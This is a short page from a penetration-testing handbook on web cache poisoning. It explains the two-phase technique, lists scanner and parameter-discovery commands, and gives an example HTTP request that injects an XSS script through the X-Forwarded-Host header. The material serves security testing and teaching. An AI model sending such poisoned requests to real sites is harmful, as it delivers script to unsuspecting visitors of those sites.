Pentest Book
Search…
Web Cache Poisoning

General

Web cache poisoning is an advanced technique whereby an attacker exploits the behavior of a web server and cache so that a harmful HTTP response is served to other users.
Fundamentally, web cache poisoning involves two phases. First, the attacker must work out how to elicit a response from the back-end server that inadvertently contains some kind of dangerous payload. Once successful, they need to make sure that their response is cached and subsequently served to the intended victims.
A poisoned web cache can potentially be a devastating means of distributing numerous different attacks, exploiting vulnerabilities such as XSS, JavaScript injection, open redirection, and so on.

Tools

1
# https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner
2
wcvs -u https://url.com
3
# https://github.com/s0md3v/Arjun
4
python3 arjun.py -u https://url.com --get
5
python3 arjun.py -u https://url.com --post
6
# https://github.com/maK-/parameth
7
python parameth.py -u https://example.com/test.php
8
# https://github.com/devanshbatham/ParamSpider
9
python3 paramspider.py --domain example.com
10
# https://github.com/s0md3v/Parth
11
python3 parth.py -t example.com
Copied!
1
# XSS for users accessing /en?region=uk:
2
GET /en?region=uk HTTP/1.1
3
Host: innocent-website.com
4
X-Forwarded-Host: a."><script>alert(1)</script>"
Copied!
Last modified 9d ago
Export as PDF
Copy link
Edit on GitHub
Contents
General
Tools